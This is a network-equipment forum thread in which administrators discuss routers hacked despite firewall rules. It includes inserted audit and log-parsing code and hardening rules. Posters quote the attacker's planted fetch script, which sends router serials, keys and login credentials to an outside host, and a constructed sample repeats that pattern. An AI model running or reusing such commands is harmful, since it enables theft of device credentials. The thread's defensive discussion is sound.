0ldman
Forum Guru
Topic Author
Posts: 1447
Joined: Thu Jul 27, 2006 5:01 am

bug persists after updating to 6.42.3

Sat Jun 16, 2018 2:13 am

We had issues with the src address lists in the firewall letting through all traffic rather than only the traffic listed, so of course they blew right through a non-functional firewall.

They put two scripts in there, one was enabling PPPoE out, the other was this.
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=7da1df40bdee0309&action=upload&sncode=BDDC61FCE64D0922DD64998709BB639A&dynamic=static&user=myusername&pwd=mypassword")}
When you go to this site it tries to infect your system right off. Looks like they're trying to get a bunch of infected machines mining coins for them. Not sure what their intent is with Mikrotik hardware.
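The script quoted above is a `/tool fetch` that posts the router's serial number, a key and a username/password to an outside host. As an added example (not code from this thread, from MikroTik, or from any poster), the following Python audits a RouterOS script/scheduler export for exactly that shape: fetch calls to hosts outside an allowlist, credential-looking parameters in the query string, and scheduler entries that keep such a script running. The sample export, the allowlisted host `updates.example.internal` and the placeholder host/key values are constructed assumptions, and the field-extraction regexes only approximate RouterOS export syntax.

```python
"""Audit a RouterOS script/scheduler export for fetch-based credential exfiltration.

Added example; it is not code from the forum thread, MikroTik or any poster.
It looks for the shape the posters found: a script that runs /tool fetch
against an external host with router credentials in the query string, and a
scheduler entry that keeps running it. SAMPLE_EXPORT below is constructed;
the host and key values in it are placeholders, not real indicators.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Query-string keys that mean credentials or device identifiers are leaving the router.
SENSITIVE_KEYS = {"user", "pwd", "password", "pass", "key", "sncode", "token"}

# Hosts the operator legitimately fetches from (assumption: an internal update mirror).
ALLOWED_HOSTS = {"updates.example.internal"}

# Matches /tool fetch url=("...") as pasted in the thread, or url=\"...\" inside an
# export's source="..." string (assumed escaping, approximating RouterOS syntax).
FETCH_RE = re.compile(r'/tool\s+fetch\b[^\n]*?url=\(?\s*\\?"((?:[^"\\]|\\.)*?)\\?"')

SAMPLE_EXPORT = r'''
# constructed sample in the shape of a RouterOS export (not a real device's output)
/system script
add name=fw-mirror source="{/tool fetch url=(\"http://updates.example.internal/fw.npk\")}"
add name=upd source="{/tool fetch url=(\"http://ATTACKER-HOST.invalid/Core/Update.ashx\?key=PLACEHOLDER&action=upload&sncode=PLACEHOLDER&dynamic=static&user=admin&pwd=hunter2\")}"
/system scheduler
add interval=1d name=sched-upd on-event=upd start-time=startup
'''


def _entries(export_text):
    """Yield (section, line) for each 'add ...' line, joining RouterOS '\\' line continuations."""
    joined = re.sub(r"\\\r?\n\s*", "", export_text)
    section = None
    for line in joined.splitlines():
        line = line.strip()
        if line.startswith("/"):
            section = line
        elif line.startswith("add "):
            yield section, line


def _field(line, key):
    """Return the value of key=... (quoted or bare) from an export line, or ''."""
    m = re.search(r"\b" + re.escape(key) + r'=("[^"]*"|\S+)', line)
    return m.group(1).strip('"') if m else ""


def audit_fetch(section, line):
    """Findings for every /tool fetch call embedded in one export entry."""
    findings = []
    name = _field(line, "name") or "<unnamed>"
    for raw in FETCH_RE.findall(line):
        url = re.sub(r"\\(.)", r"\1", raw)  # drop RouterOS escapes such as \? and \"
        parts = urlsplit(url)
        host = parts.hostname or ""
        keys = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
        if host not in ALLOWED_HOSTS:
            findings.append({"section": section, "name": name, "host": host,
                             "issue": "fetch to non-allowlisted host"})
        leaked = sorted(keys & SENSITIVE_KEYS)
        if leaked:
            findings.append({"section": section, "name": name, "host": host,
                             "issue": "credentials/identifiers in query: " + ",".join(leaked)})
    return findings


def audit_export(text):
    """Audit scripts first, then flag scheduler entries that keep a flagged script running."""
    entries = list(_entries(text))
    findings, flagged = [], set()
    for section, line in entries:
        for f in audit_fetch(section, line):
            findings.append(f)
            flagged.add(f["name"])
    for section, line in entries:
        target = _field(line, "on-event")
        if section == "/system scheduler" and target in flagged:
            findings.append({"section": section, "name": _field(line, "name"), "host": "",
                             "issue": f"scheduler runs flagged script '{target}'"})
    return findings


if __name__ == "__main__":
    for f in audit_export(SAMPLE_EXPORT):
        print(f"{f['section']} {f['name']!r} {f['host']}: {f['issue']}")
```

Run it against the text of `/system script export` and `/system scheduler export` taken from a router; the scheduler pass matters because the posters found the fetch re-armed after cleanup, and a script that survives only because a scheduler keeps invoking it is easy to miss when reading the script list alone.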
 
anav
Forum Guru
Posts: 4614
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 2:38 am

Without confirmation that you are following stated directions...
a. you are using latest OS
b. have closed down the router from external access.

Then one can expect to be hacked unfortunately.
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
zimzum
just joined
Posts: 9
Joined: Thu Oct 19, 2017 1:37 pm
Location: Murcia

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 12:00 pm

I have the same problem with two MikroTiks. Both have the latest firmware and RouterOS version from two weeks ago.
 
msatter
Forum Guru
Posts: 1703
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 12:19 pm

One RB4011 (cooled) and a RB760iGS (hEX S) in series. The 4011 Does PPPoE/IKEv2.
The cooler: viewtopic.php?f=3&t=138613&start=300#p799879
Running:
RouterOS 6.47 / Winbox 3.24 / MikroTik APP 1.3.14
 
gordon65
just joined
Posts: 1
Joined: Sat Jun 21, 2014 1:16 am

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 7:12 pm

Hello,

here is some more information about the changes that have been made:

I immediately updated my version. I can't tell which version I had before.

Scripts:
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=bdee03097da1df40&action=upload&sncode=17E88147941B12F2E415872A518FBD9F&dynamic=static")}
Attachments: log.PNG, radius.PNG
 
0ldman
Forum Guru
Topic Author
Posts: 1447
Joined: Thu Jul 27, 2006 5:01 am

Re: bug persists after updating to 6.42.3

Sat Jun 16, 2018 10:22 pm

I'm very aware of those.

What I'm talking about is how we got hit with one.

Address lists are being ignored in the filter section of the firewall randomly.

We noticed it around 6.30 and it randomly pops up ever since. I had my DNS blocked to all but allowed address list of "DNS". When I updated to 6.30 I had to change all of my rules as the DNS address list was ignored. The same was happening with my port 80 and winbox rules, only in reverse. Instead of only allowing my addresses it allowed all addresses and I didn't catch it until we had already been hacked.

What I'm talking about is a system that *was* locked down to only allowed addresses through firewall filter rules. The address lists were ignored.
 
leopiri
just joined
Posts: 5
Joined: Fri May 08, 2009 9:25 am

Re: bug persists after updating to 6.42.3

Mon Jun 18, 2018 12:44 am

I had the same problem, winbox port blocked only for network provider, latest version and firmware, strong users and passwords, I noticed this on June 15 at 10pm.
 
R1CH
Forum Veteran
Posts: 926
Joined: Sun Oct 01, 2006 11:44 pm

Re: bug persists after updating to 6.42.3

Mon Jun 18, 2018 7:54 pm

If you didn't change passwords after upgrading to fix the winbox exploit, this is likely how they are gaining access. Change all passwords, preferably after netinstall to ensure no remaining backdoors.
 
katem07
just joined
Posts: 17
Joined: Mon Apr 10, 2017 11:35 am
Location: SAR

Re: bug persists after updating to 6.42.3

Tue Jun 19, 2018 12:35 am

Secure your firewall with these rules; change in-interface to match your WAN interface name.
/ip firewall filter
# the two disabled passthrough rules are only markers for where this block starts and ends
add action=passthrough chain=unused-hs-chain comment=\
    "###### Access Protection Start" disabled=yes
# record every outside connection attempt to a management port (timeout=0s keeps the entry permanently)
add action=add-src-to-address-list address-list=Hacker address-list-timeout=0s \
    chain=input comment="Add External Access Tries" dst-port=\
    21,22,23,80,443,8291,8728,8729 in-interface=WAN log=yes log-prefix=\
    "Security System <>" protocol=tcp
add action=drop chain=input comment="Block External Access to Ports" dst-port=\
    21,22,23,80,443,8291,8728,8729 in-interface=WAN protocol=tcp
add action=drop chain=input comment="Block External Access to DNS" dst-port=53 \
    in-interface=WAN protocol=tcp
add action=drop chain=input comment="Block External Access to DNS" dst-port=53 \
    in-interface=WAN protocol=udp
add action=passthrough chain=unused-hs-chain comment=\
    "###### Access Protection End" disabled=yes
By the way, I tracked the hacker's MAC address and found this result: E4:8D:8C:3A:E5:96, which belongs to RouterBoard.Com!
Last edited by katem07 on Tue Jun 19, 2018 11:37 am, edited 1 time in total.
Knowledge Sharing ... :idea: :wink:
  • Facebook:Fb.com/katem07
  • Ahmed Mosilly
  • Regards.
 
florid
newbie
Posts: 38
Joined: Wed Dec 20, 2017 6:27 am

Re: bug persists after updating to 6.42.3

Tue Jun 19, 2018 4:29 am

> By the way, I tracked the hacker's MAC address and found this result: E4:8D:8C:3A:E5:96, which belongs to RouterBoard.Com!
That's your WAN interface MAC address.
 
katem07
just joined
Posts: 17
Joined: Mon Apr 10, 2017 11:35 am
Location: SAR

Re: bug persists after updating to 6.42.3

Tue Jun 19, 2018 11:28 am

> > By the way, I tracked the hacker's MAC address and found this result: E4:8D:8C:3A:E5:96, which belongs to RouterBoard.Com!
> That's your WAN interface MAC address.
How did you know that! :D

No buddy, I have checked all my ether(s) and bridge MAC addresses; that's not one of them.
 
Modestas
just joined
Posts: 18
Joined: Mon Jul 16, 2012 10:59 am
Location: Vilnius, Lithuania

Re: bug persists after updating to 6.42.3

Tue Jun 19, 2018 3:17 pm

> > > By the way, I tracked the hacker's MAC address and found this result: E4:8D:8C:3A:E5:96, which belongs to RouterBoard.Com!
> > That's your WAN interface MAC address.
> How did you know that! :D
I really wonder how you pulled a MAC address from the remote server RouterBoard.Com.
> No buddy, I have checked all my ether(s) and bridge MAC addresses; that's not one of them.
What about your ISP gateway MAC address?

As a side note, F5 blog https://www.f5.com/labs/articles/threat ... kim-summit says there was an attack on Jun 11 targeting some known vulnerabilities, and MikroTik's port 8291 was not forgotten. See Fig 3 for attack destination country stats.
 
katem07
just joined
Posts: 17
Joined: Mon Apr 10, 2017 11:35 am
Location: SAR

Re: bug persists after updating to 6.42.3

Wed Jun 20, 2018 1:02 pm

> I really wonder how you pulled a MAC address from the remote server RouterBoard.Com.
By firewall filter I did log the attacker's src address, so when he attacks my host, the MikroTik server logs his src address and (a) src MAC address.
The src MAC address logged in my server log does not belong to me, that's all buddy.
> What about your ISP gateway MAC address?
>
> As a side note, F5 blog https://www.f5.com/labs/articles/threat ... kim-summit says there was an attack on Jun 11 targeting some known vulnerabilities, and MikroTik's port 8291 was not forgotten. See Fig 3 for attack destination country stats.
I was really wondering about the possibility of it being my ISP WAN, so I didn't say that it's the attacker's MAC; I just said it belongs to RouterBoard.com.
But I'm sure that it's not my WAN interface MAC address.

I checked out the F5 blog, and I found the same IP subnet of the attacker bottled in my dynamic address list:

188.246.234.62 | in my dynamic address list
188.246.234.60 | in F5 article
Maybe they did it because of the Turkish elections, because my ISP is Turktelecom.

Also, I attached all the attackers' IP addresses that attacked my nine servers, if you want to block them in advance :)
Regards
 
tippenring
Member Candidate
Posts: 243
Joined: Thu Oct 02, 2014 8:54 pm
Location: St Louis MO

Re: bug persists after updating to 6.42.3

Wed Jun 20, 2018 4:59 pm


> By firewall filter I did log the attacker's src address, so when he attacks my host, the MikroTik server logs his src address and (a) src MAC address.
> The src MAC address logged in my server log does not belong to me, that's all buddy.
MAC addresses work only at the broadcast domain level (layer 2). No MAC address is ever routed to another subnet. The MAC addresses on a frame are always updated by routers. So no, you do not have the MAC of your attacker. You have the MAC of the device in the broadcast domain that sent you the packet.
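tippenring's point can be checked directly in the log that katem07's `log=yes` rule produces: if every remote source IP arrives under the same src-mac, that MAC is the layer-2 neighbour (normally the ISP gateway), not any attacker. The following Python is an added example, not code from this thread, from MikroTik or from any poster. The log lines are constructed to resemble a RouterOS firewall log hit (timestamp, topics, prefix, chain, interfaces, src-mac, protocol, src:port->dst:port, length); the exact field layout is an assumption, and the remote addresses reuse the 188.246.234.62 and E4:8D:8C:3A:E5:96 values quoted in the thread plus documentation ranges.

```python
"""Parse RouterOS-style firewall log hits and show why the logged src-mac is not the attacker.

Added example; not code from the thread, MikroTik or any poster. SAMPLE_LOG is
constructed to resemble what a filter rule with log=yes writes; the field layout
is an assumption, so adjust LOG_RE if your router's lines differ.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<topics>\S*firewall\S*) (?P<prefix>.*?) (?P<chain>\w+): "
    r"in:(?P<in_if>\S+) out:(?P<out_if>\S+(?: \S+)?), src-mac (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}), "
    r"proto (?P<proto>\w+)(?: \([^)]*\))?, (?P<sip>[\d.]+):(?P<sport>\d+)->(?P<dip>[\d.]+):(?P<dport>\d+), "
    r"len (?P<length>\d+)$",
    re.IGNORECASE,
)

# Constructed sample: three remote IPs, one shared src-mac, one unrelated log line in between.
SAMPLE_LOG = """\
jun/19 00:12:01 firewall,info Security System <> input: in:ether1 out:(unknown 0), src-mac e4:8d:8c:3a:e5:96, proto TCP (SYN), 188.246.234.62:51234->203.0.113.5:8291, len 60
jun/19 00:12:03 firewall,info Security System <> input: in:ether1 out:(unknown 0), src-mac e4:8d:8c:3a:e5:96, proto TCP (SYN), 188.246.234.62:51235->203.0.113.5:22, len 60
jun/19 00:12:09 firewall,info Security System <> input: in:ether1 out:(unknown 0), src-mac e4:8d:8c:3a:e5:96, proto TCP (SYN), 198.51.100.23:40022->203.0.113.5:8291, len 60
jun/19 00:12:14 system,info,account user admin logged in from 192.0.2.10 via winbox
jun/19 00:12:20 firewall,info Security System <> input: in:ether1 out:(unknown 0), src-mac e4:8d:8c:3a:e5:96, proto TCP (SYN), 198.51.100.77:3391->203.0.113.5:8291, len 60
jun/19 00:12:31 firewall,info Security System <> input: in:ether1 out:(unknown 0), src-mac e4:8d:8c:3a:e5:96, proto TCP (SYN), 188.246.234.62:51240->203.0.113.5:8728, len 60
"""


def parse_firewall_log(line):
    """Return the fields of one firewall log hit as a dict, or None for non-matching lines."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    hit = m.groupdict()
    for k in ("sport", "dport", "length"):
        hit[k] = int(hit[k])
    hit["mac"] = hit["mac"].lower()
    return hit


def summarize(log_text):
    """Count hits per source IP, per src-mac and per destination port."""
    hits = [h for h in map(parse_firewall_log, log_text.splitlines()) if h]
    return {
        "hits": len(hits),
        "by_ip": Counter(h["sip"] for h in hits),
        "by_mac": Counter(h["mac"] for h in hits),
        "by_port": Counter(h["dport"] for h in hits),
    }


def mac_is_next_hop(summary, min_sources=2):
    """True when distinct remote IPs all arrive under one src-mac: that MAC belongs to
    the layer-2 neighbour (typically the ISP gateway), not to any of the remote hosts."""
    return len(summary["by_mac"]) == 1 and len(summary["by_ip"]) >= min_sources


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("hits:", s["hits"], "sources:", dict(s["by_ip"]), "ports:", dict(s["by_port"]))
    for mac in s["by_mac"]:
        print(mac, "is the next-hop MAC, not an attacker" if mac_is_next_hop(s) else "")
```

The source IPs and destination ports are what is worth acting on (feeding the address list, confirming that only the expected management ports are being probed); the MAC column only tells you which device on your own segment handed the router the packet.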
 
katem07
just joined
Posts: 17
Joined: Mon Apr 10, 2017 11:35 am
Location: SAR

Re: bug persists after updating to 6.42.3

Thu Jun 21, 2018 12:26 pm

It's really valuable information, thanks man.
